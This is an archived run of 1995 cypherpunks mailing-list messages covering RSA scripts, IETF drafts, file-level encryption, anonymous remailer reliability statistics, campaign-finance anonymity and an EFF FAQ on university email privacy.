In-Reply-To: <Pine.BSD/.3.91.951217221057.9112A-100000@segwun.muskoka.net>
Message-ID: <Pine.LNX.3.91.951217230056.92B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 17 Dec 1995, Richard D. Sheffar wrote:
 
[Perl RSA sig deleted]
> Okay, I admit it I don't know everything.
> What does the perl script actually do.
> I saved to file, chmod 777 perly
> tried running the script and kept getting error line 3.
> What does it do, does it encrypt a file or what. What Have i done wrong?
> 

The script, when supplied with a exponent (public or secret) and a modulus,
encrypts standard input with the RSA algorithm and sends the result to
standard output.  You can get all the info on this from http://dcs.ex.ac.uk/
~aba/rsa/.  In response to why it doesn't work, did you check to see if you
have a working copy of the UNIX program "dc"?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNTogrZc+sv5siulAQHqPQP+LDCv8cNmyQh0vxcF5hS+Mk96PgpygmL4
QLjcdHZTUKHxRD8/V0b84+JITqc8uPKy/aN6Vp9ZiihRb8VBxWQzbJt5w2YIglW0
jzh1IFiRQ1O2oJzNG+mNjJfrJYwXG88BcajOd7JrsPj0uC9oh5hkRMFgMtFSjNsm
m5G+F4rLlBM=
=D9LX
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Dec 1995 14:12:08 +0800
To: cypherpunks@toad.com
Subject: IETF draft on data protection via crypto API
Message-ID: <9512180438.AA02976@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


A Revised Internet-Draft is available from the on-line Internet-Drafts 
directories. This draft is a work item of the Common Authentication 
Technology Working Group of the IETF.                                      

       Title     : Independent Data Unit Protection Generic Security 
                   Service Application Program Interface  (IDUP-GSS-API)   
       Author(s) : C. Adams
       Filename  : draft-ietf-cat-idup-gss-03.txt
       Pages     : 35
       Date      : 12/14/1995

The IDUP-GSS-API extends the GSS-API [RFC-1508] for applications requiring 
protection of a generic data unit (such as a file or message) in a way 
which is independent of the protection of any other data unit and 
independent of any concurrent contact with designated "receivers" of the 
data unit.  Thus, it is suitable for applications such as secure electronic
mail where data needs to be protected without any on-line connection with 
the intended recipient(s) of that data.  Subsequent to being protected, the
data unit can be transferred to the recipient(s) - or to an archive - 
perhaps to be processed ("unprotected") only days or years later.          

Internet-Drafts are available by anonymous FTP.  Login with the username
"anonymous" and a password of your e-mail address.  After logging in,
type "cd internet-drafts" and then
     "get draft-ietf-cat-idup-gss-03.txt".
A URL for the Internet-Draft is:
ftp://ds.internic.net/internet-drafts/draft-ietf-cat-idup-gss-03.txt
 
Internet-Drafts directories are located at:	
	                                                
     o  Africa                                   
        Address:  ftp.is.co.za (196.4.160.8)	
	                                                
     o  Europe                                   
        Address:  nic.nordu.net (192.36.148.17)	
        Address:  ftp.nis.garr.it (192.12.192.10)
	                                                
     o  Pacific Rim                              
        Address:  munnari.oz.au (128.250.1.21)	
	                                                
     o  US East Coast                            
        Address:  ds.internic.net (198.49.45.10)	
	                                                
     o  US West Coast                            
        Address:  ftp.isi.edu (128.9.0.32)  	
	                                                
Internet-Drafts are also available by mail.	
	                                                
Send a message to:  mailserv@ds.internic.net. In the body type: 
     "FILE /internet-drafts/draft-ietf-cat-idup-gss-03.txt".
							
NOTE: The mail server at ds.internic.net can return the document in
      MIME-encoded form by using the "mpack" utility.  To use this
      feature, insert the command "ENCODING mime" before the "FILE"
      command.  To decode the response(s), you will need "munpack" or
      a MIME-compliant mail reader.  Different MIME-compliant mail readers
      exhibit different behavior, especially when dealing with
      "multipart" MIME messages (i.e., documents which have been split
      up into multiple messages), so check your local documentation on
      how to manipulate these messages.
							
For questions, please mail to Internet-Drafts@cnri.reston.va.us.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 18 Dec 1995 17:13:32 +0800
To: cypherpunks@toad.com
Subject: Re: [more NOISE] BIO-MUNITION: gifs of perl-RSA tattoo
Message-ID: <2.2b7.32.19951218083043.0088d0c0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 12/17/95 -0500, you wrote:
[Much noise on Perl-RSA tatoo and compile problems deleted]

The only thought that came to mind on this thread was how closely the tatoo
artist spellchecked that tatoo.  It would be pretty funny to have a
"munitions violation" that was non-functional due to tatooing errors.

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GLEN_MCBRIDE@BayNetworks.com (Glen McBride)
Date: Tue, 19 Dec 1995 08:45:26 +0800
To: cypherpunks@toad.com
Subject: Securing the end-points
Message-ID: <608235518.31497752@BayNetworks.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greetings!
I was wondering if in addition to all the work and discussion regarding
crypto which generally centres around the transmission path information takes
traveling from end-point to end-point, there is any work being done to secure
the end-points themselves (I.e. files on your PC etc.)

In my view the end-points present the most vulnerability in the overall
message path from person to person. It is at these points that the
message/information exists as cleartext even if for a short period of time.
While of course it is possible to PGP encode your files is this a practical
way to go about securing your system? I am aware or RSA secure but is that
all there is out there?

Thanks in advance

Glen McBride
Bay Networks ASIA-PAC customer service 
Australia

Views are my own and do not represent those of my employer

===== CURRENT PGP KEY FOLLOWS =====
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQERAzDFDk4AAAEIAJvkPKWMS8TR5eNNQZw5FjUg8roSe/wFdw3d8vCEfb2lX3G+
qBAQKuTSUAhO8marZvNWF9VPuyqkOGEOrwzdont8jSHAdF9dguh1sP56eGXzyn8n
mDN1Fw8vQiNrttvCEYUjvLEML8tFlLc7QlQRkAMEGrkH29D4ck3wOkJLEaSZrTcO
RIZAzOBVVvrJORVKsREnGG4IrItJCiREw7Gp/LXIHMSEBCdu2+uaNc9nHQxKcYZc
yx9UiiZ0XP6TzzUtkD00ZDtO8OdZCAhXdj0zbCUKVrzuY37EgnFVFQ7SlZZAQn/U
Jx26k0eZvZhXjhSVd3QyElbJYNFVLrdyU+h+Gt0AIwQAAAABtCpHbGVuIE1jQnJp
ZGU8R0xFTl9NQ0JSSURFQGJheW5ldHdvcmtzLmNvbT4=
=N/lg
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMNS1vy63clPofhrdAQHn1wgAjHV2vKXIEY4qZ/Rm2rq4hnJsUJDt+zd5
BbYo/BZBruwX+gqylYlbOemkPvZ7ktAMdu9jUFfaJQ7Cb3jT4kgfp2dqqle6yaq1
0nxU9m7BMiVnSqevtK5Fy+thR/yVZWdHi1LFMy48yp8FCaqvMkEruscOsG0ydUNM
lyf3OCNGdN7LQcxQkRE9UzKPwEpacDD/afU5W5aZhhchkpAH9t/kqKzvgXxia1VF
4hfOEcCMN21JO6QGqdnHASVNoIdV44O6BlUPhv5omAqofgU58tnbJ9G3/24zjecM
QhxTMGBv+aDB1DtQ+k9wDJTdPBLwhqyWUZWImN3RPVnQb1Ec1CVM8A==
=yLIB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Mon, 18 Dec 1995 17:12:40 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <199512171048.VAA23204@sweeney.cs.monash.edu.au>
Message-ID: <Pine.A32.3.91.951218004301.41900A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 17 Dec 1995, Jiri Baum wrote:

> > In this particular case what im concerned about is a temporary  cleartext 
> > copy of a permanently encrypted document.  The cleartext only exists for 
> > about 1-4 seconds, and then is deleted, so backups arent really a 
> > problem..  
> 
> Is it then necessary to write it to disk?

Im pretty sure that its nessecary.. at least at this point.  Basically 
what im working on is a bit of front end that trys to make keeping things 
encrypted a bit less of a hassle.  It needs to be able to read multiple 
file types, and as such it does some odd things. It opens the file and 
figures out the magic for it, closes it, then jumps to the right routine 
for reading the particular thing.. the file is opened again, perhaps 
once, perhaps repeatedly, depnding on the nature of what is going on.. 
then when it finishes with the file the cleartext copy is removed.. the 
main idea pushing me here is that if you were to encrypt things on your 
harddrive for storage, you would most likely want access to them at some 
point, and if your like me, you'd want access to them on a regular basis. 
Prior to starting work on this project i would manually decode whichever 
file i needed, work with it, andd then delete it. This was a pain in the 
ass, and also somewhat less secure since im only human and could 
conceivabley forget to resecure the file after im done using it.  So 
looking at it from a relaxed standpoint.. the code as it stands now is at 
least as good as the previou method i was using, and is alot simpler. :) 
To be a bit more critical, neither method seems to be the BEST  method.. 

I hate saying this cause it feels like a cop out, but I keep coming back to 
the question of usability versus iron-clad security. At this point there 
is no noticible speed difference between using the program with encrypted 
versus decrypted files. Im pretty concerned about the overhead of getting 
too involved in a flawless implementation. I think at this point if i 
could produce a first release that would be "good enough" to pass (for 
example) a moderatly sophisticated once over by local law enforcement, i 
would be content.  Once thats available I have alot of other things tthat 
I'd like to see done better..  Incidentally, i'm planning to post the 
full details including an FTP site sometime in january or febuary.. at 
that point i expect to be torn to shreds by the cryptographic comunity.. 

:) 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 18 Dec 1995 16:47:29 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem & Groucho's Duck
In-Reply-To: <199512160537.AAA23233@pipe6.nyc.pipeline.com>
Message-ID: <199512180803.DAA01695@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes:
> At this point, this holiday season, I had an image of Merkle sitting by the
> tree putting an infinite number of prime numbers in an infinite number of
> boxes. (In the real world I've been fighting with my landlord and suddenly
> thought of Cantor's first description of the landlord's dilema where a
> landlord has an infinite number of rooms, all full, when another guest
> shows up and wants a room.) 

:]

> At this point, I suddenly had an image of Cantor sitting on the floor next
> to Merkle. Merkle would pack an infinite number of boxes and hand each box
> to Cantor who would proceed to wrap each box in an infinite number of
> sheets of wrapping paper. 
>  
> Suddenly, I saw that my first suggested solution put all of the major work
> on Alice. She had to generate 10^6 prime pairs and send them all to Bob
> then brute force an average of (10^6)/2 attempts to discover the one pair
> Bob picked ot factor. 
>  
> This process *might* be speeded up if Bob would, Cantor-like, help out. In
> other words, have Alice generate and transmit 10^3 prime pairs and have Bob
> do the same. This cuts transmission time by 5*(10^5), a considerable
> savings. 

Mmm, didn't you just cut it in half (assuming simultaneous receive/transmit),
saving about 10^3 time ?  (I can't get through to the archives at the moment.)
Anyway, it's a nice improvement to the protocol.

> Then Alice and Bob each have to brute force an average of 5*(10^2) attempts
> to discover each others primes, for a similar savings. 
>  
> However, you still need a nonpatented algorythm that lets them use the four
> primes to encypher their message(s) while forcing the others on the
> elevator to factor an average of (10^3^2)/2 products instead of
> 2*((10^3)/2). 
>  
> This is still very far from a solution to the elevator problem as re-posed
> by Futplex but creates at least one way of *potetentially* shortening the
> prime generation and transmission time issue he was kind enough to point
> out. 

I guess we should once again wish Roger Schlafly the best of luck in his
ongoing litigation. 

While we're on the subject, I've just noticed an interesting protocol in
Schneier, "invented by Shamir but never published", for communication over
an insecure channel without a shared secret ["Shamir's Three Pass Protocol" in
v.1,Sec.16.1,pp.376-377]. This protocol seems to have very appealing 
features, so I'm a little surprised that only the initial reference is given 
in Schneier. Using Shamir's proposed commutative symmetric cipher with it,
I suppose it's probably slower than DH for key exchange, and progress on the
discrete log problem would affect it just as much as RSA. Anyone have other
references offhand, or know any other reasons this protocol isn't so useful ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 18 Dec 1995 19:02:53 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Campaign Finance Reform
In-Reply-To: <m0tRZDX-0008ycC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951218031739.17673A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, jim bell wrote:

> >>It occurs to me that it would be a major advance if a system could be set up
> >>that would "blind" campaign donations as to their source:  The donor could
> >>be satisfied that his donation gets to the candidate or cause, but the
> >>candidate couldn't know  who actually paid the money (and the donor would be
> >>unable to prove that he made a donation, for example).  Admittedly there are
> >>a lot of details that need to be worked out, but if this could be
> >>accomplished it would change politics as we know it.
> >
> >If you'll give it some more thought, Jim, you'll see that it has a loophole
> >in it you could drive a semi through. There is no way to keep a donor from
> >passing the word to the recipient. No matter how you work out the details,
> >it's impossible to keep the information from passing. It could never work.
> 
> It is absolutely true that you couldn't stop a person from communicating
> claims of a donation to a politician.   But what you COULD do is to ensure
> that the donor couldn't PROVE that he made such a donation.  In other words,
> _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
> senator would have no idea that I wasn't telling the truth.  The people who
> REALLY made such donations would be helpless.

A tricky way around this, if it's done ALMOST properly, is to donate in 
odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
your campaign..."

All this means is that the donations would have to be lumped in some way 
so that Senator Sludgepump can't find out the exact amounts donated by 
any individual.

ObCrypto: Donating a specific amount of money could be considered a 
covert channel.
 
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 18 Dec 1995 14:01:25 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted telnet...
Message-ID: <199512180438.XAA08244@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 95 12:48:41 CST, you wrote:

An alternative to writing an entirely new proggie might be to write an
add-on DLL for Windoze telnet clients that support add-ons... EWAN
comes to mind here.


>I am looking for an encrypted telnet (or rlogin/etc) package
>that supports a Windoze client.  

>It looks like all the normal ones that I can find 
>(SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids.  
>Don't get me wrong - I would prefer to use Unix, but I am
>headed off to locations, where I know all I'll have access to 
>is Windows, with a PPP stack to some ISP.

>I'ld write it myself, - pasteing different packages together,
>but I need it working in a day or two.  Can anyone help me here?  


>Thanks,
>Dan
>------------------------------------------------------------------
>Dan Oelke                                  Alcatel Network Systems
>droelke@aud.alcatel.com                             Richardson, TX







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 18 Dec 1995 23:53:20 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512181450.GAA18890@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Over the past few weeks, the remailer-list has been showing somewhat
poor performance of the remailers. Well, most of the problem was my
fault, rather than that of the remailers. I had managed to turn off
suid on my sendmail binary, with bad results. It's fixed now.

Last update: Mon 18 Dec 95 6:49:26 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     __...-++-+++  9:56:07  99.98%
hacktic  remailer@utopia.hacktic.nl        *********+*     7:46  99.94%
ecafe    cpunk@remail.ecafe.org           #-##_#--####    49:58  99.92%
c2       remail@c2.org                    + ++-.--++++  1:27:22  99.91%
flame    remailer@flame.alias.net          *********+*    12:10  99.85%
amnesia  amnesia@chardos.connix.com       +--+-------   2:55:50  99.84%
portal   hfinney@shell.portal.com         ####*# .#**+    54:51  99.80%
replay   remailer@replay.com              ** ********#    24:11  99.80%
bsu-cs   nowhere@bsu-cs.bsu.edu             #_##.#*#-#    50:50  99.64%
rmadillo remailer@armadillo.com           + +++++++ ++    39:23  99.55%
vishnu   mixmaster@vishnu.alias.net           #-*#*++*    20:25  99.40%
alumni   hal@alumni.caltech.edu             #_*_.-+*++  1:00:21  99.37%
ford     remailer@bi-node.zerberus.de     .--._._.-+++ 14:08:00  99.24%
spook    remailer@valhalla.phoenix.net    **** - * *+*    22:56  99.10%
hroller  hroller@c2.org                   ## -...-##+#    44:42  98.83%
wmono    wmono@valhalla.phoenix.net       *  *  .* *+*    16:13  98.72%
penet    anon@anon.penet.fi               _--_--__..   31:02:40  98.56%
shinobi  remailer@shinobi.alias.net       - -_- +++--     52:27  96.76%
extropia remail@extropia.wimsey.com       .----_.-.-   13:31:30  94.19%
rahul    homer@rahul.net                  +**+*_.*#++#  1:18:24  99.92%
gondolin mix@remail.gondolin.org          -_.------     8:23:37  79.17%
robo     robo@c2.org                      #         *#     3:38  57.61%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Mon, 18 Dec 1995 23:29:46 +0800
To: stewarts@ix.netcom.com
Subject: Re: Motorola Secure Phone
Message-ID: <199512181337.NAA28013@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995 17:38:49 -0800 you wrote:

>At 06:40 PM 12/15/95 EST, you wrote:
>>
>
>I don't know Moto's phone models, but there are some cordless phones,
>especially long-range 900MHz ones, that are "secure" because of
>spread-spectrum, and others that call themselves "secure" because
>they're "digital", so you can't eavesdrop on them just by playing
>with a scanner and maybe single-sideband.  Sigh.
>
Well, just to finish the story, I ended up getting the Cincinatti
Microwave Escort 9000 (yes, the radar detector people).  It's 900 MHz
digital spread-spectrum, although it's still unclear how secure their
implementation is.  I'll call them and see what I can come up
with....I realize it's *not* going to give me military-style security.
 But really all I'm interested in is making it simpler (ie cheaper)
for Big Brother to wiretap me than to deal with trying to scan me
without court authorization.
					Dan
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Dec 1995 23:31:28 +0800
To: cypherpunks@toad.com
Subject: GIA_nts
Message-ID: <199512181341.IAA28130@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-18-95. NYPaper:

   "Telecommunications Giants Join Internet Security Quest."

      The consortium seeks to establish a layer of software
      and hardware standards that would effectively rest atop
      the Internet. Their goal is to make the Internet more
      secure, reliable and easy to use. The consortium started
      meeting last summer, and had seven core members: AT&T,
      Deutsche Telekom, Lotus, Novell, NTT, the Telstra
      Corporation and Unisource. The group held private 
      meetings from Dec. 6 through Dec. 9 in New York, 
      attended by 24 phone carriers and 14 computer companies, 
      including Intel, Microsoft, Sun and the Hewlett-Packard. 


   "The prospect of Internet censorship raises troubling
   issues for business." Denise Caruso's column.

      While most of the outcry has raised valid concerns about
      the First Amendment and civil liberties, little of the
      discussion has focused on how censorship could cripple
      much of the Internet's commercial potential. "This
      proposal will have more than a chilling effect," Ms.
      Fulton said. "It may well mean a cold death for everyone
      except very rich and very cautious media companies."


   GIA_nts  (11 kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Huddleston <reh@wam.umd.edu>
Date: Tue, 19 Dec 1995 03:31:20 +0800
To: vznuri@netcom.com
Subject: Re: Political Cleanup program
Message-ID: <199512181412.JAA08672@exp2.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Detweiler wrote:
* >JB:
* >>Politics is traditionally corrupt, it appears, because donors to politicians
* >>and political campaigns expect a quid pro quo for their donations.  Various
* >>unsatisfactory solutions include campaign spending limits, etc.
* >
* >I have an unusual view that I've never seen elsewhere: the problem with
* >our government is not that money or PACs are involved, but that the system
* >does not handle or resolve the conflicts between them very well. in other
* >words, in contrary to the current view that all PACs are evil, I think the
* >problem is not that we have PACs, but that our current system does not
* >balance their demands in some sensible manner.  the system is
* >susceptible to corruption. it is conceivable however that there would be
* >a system that involves money and politics but still avoids corruption.

Not to sound like a dupe or anything, but every time I get discouraged
at the rampant mealyism of our political system I go read the first
couple of paragraphs of a text from GOVT 101.  There, I get reminded that
the way most political debate is handled elsewhere is with bullets.

Personally, I welcome a complete equity between all lobbyists seeking to
obtain a politico's ear.  Take the money out of the equation, and let the
merits of their causes, if any, stand on their own. 

Happy holidays,

Richard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Tue, 19 Dec 1995 05:13:06 +0800
To: cypherpunks@toad.com
Subject: redirect of newsgroups
Message-ID: <9511188193.AA819305757@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     For those of us sitting behind a firewall that blocks out all of the 
     alt, rec, etc.. newsgroups...is there another way to access these 
     groups?  For example, redirecting the contents of alt.2600 to, say, 
     comp.2600 (because this firewall allows the comp.xxx groups through).  
     Or any other hacks around this inconvenience?
     
     -----BEGIN PBP SIGNATURE-----
     Version: 1.0.0, Copyright 1995, Pretty Bad Privacy

     David Klur 
     dklur@dttus.com

     I am who I am because I say so.  So there.
     -----END PBP SIGNATURE-------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carl M. Kadie" <kadie@eff.org>
Date: Tue, 19 Dec 1995 04:23:33 +0800
To: cypherpunks@toad.com
Subject: Oklahoma University: Is this legal?...
In-Reply-To: <Pine.SUN.3.91.951217011017.25860A-100000@eff.org>
Message-ID: <199512181751.JAA07443@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


No state law does or could prempt the 5th Amendment, the ECPA, or the
FERPA. Moreover, the one state FOIA (Illinois') I've read in detail
*doesn't* even try to do this.

I'm enclosing two FAQ's. The first is about email privacy. The second
is about student media.

I also suggest sending email to marsha-w@uiuc.edu (Marsha Woodbury)
she is an expert in the application of FOIA laws to universities
and a CPSR officer.

- Carl
Carl Kadie -- I do not represent EFF or my employer; this is just me.
 =Email: kadie@eff.org, kadie@cs.uiuc.edu =
 =URL: <http://www.eff.org/CAF/>, <ftp://ftp.cs.uiuc.edu/pub/kadie/> =


=============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy ===============
q: Can (should) my university monitor my email?

a: Ethically (and perhaps legally) email communications should have
the same privacy protection as telephone calls. It would be unwise for
any university employee to tap email communications without
authorization from the university president, university legal counsel,
and the academic freedom committee. According to Mike Godwin, legal
services counsel for the Electronic Frontier Foundation (EFF), the
U.S.'s Electronic Communications Privacy Act (ECPA) could be
reasonably construed to protect university email. This is also the
reported opinion of the U. of Michigan's lawers. Also, the U.S.'s
Family Educational Rights and Privacy Act gives students at all public
and most private schools some privacy rights.

A U.S. government task force says that "[Email] monitoring [of
government employees] of actual communications and communicators may
impinge on the Constitutional rights of freedom of speech (1st
Amendment), against unreasonable search and seizure (4th Amendment),
and against self-incrimination (5th amendment), as well as on the
right to privacy, specifically as set forth in both the Privacy Act
and the ECPA."

In the context of libraries, the American Library Association's Policy
on Confidentiality of Library Records suggests this procedure to deal
with an official or police request for information about users:

'When drafting local policies, libraries should consult with their
legal counsel to insure these policies are based upon and
consistent with applicable federal, state, and local law
concerning the confidentiality of library records, the disclosure
of public records, and the protection of individual privacy.

Suggested procedures include the following:

     1.  The library staff member receiving the request to
         examine or obtain information relating to circulation or
         other records identifying the names of library users,
         will immediately refer the person making the request to
         the responsible officer of the institution, who shall
         explain the confidentiality policy.

     2.  The director, upon receipt of such process, order, or
         subpoena, shall consult with the appropriate legal
         officer assigned to the institution to determine if such
         process, order, or subpoena is in good form and if there
         is a showing of good cause for its issuance.

     3.  If the process, order, or subpoena is not in proper form
         or if good cause has not been shown, insistence shall be
         made that such defects be cured before any records are
         released. (The legal process requiring the production
         of circulation or other library records shall ordinarily
         be in the form of subpoena "duces tecum" [bring your
         records] requiring the responsible officer to attend
         court or the taking of his/her deposition and may
         require him/her to bring along certain designated
         circulation or other specified records.)

     4.  Any threats or unauthorized demands (i.e., those not
         supported by a process, order, or subpoena) concerning
         circulation and other records identifying the names of
         library users shall be reported to the appropriate legal
         officer of the institution.

     5.  Any problems relating to the privacy of circulation and
         other records identifying the names of library users
         which are not provided for above shall be referred to
         the responsible officer.'



- Carl M. Kadie

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

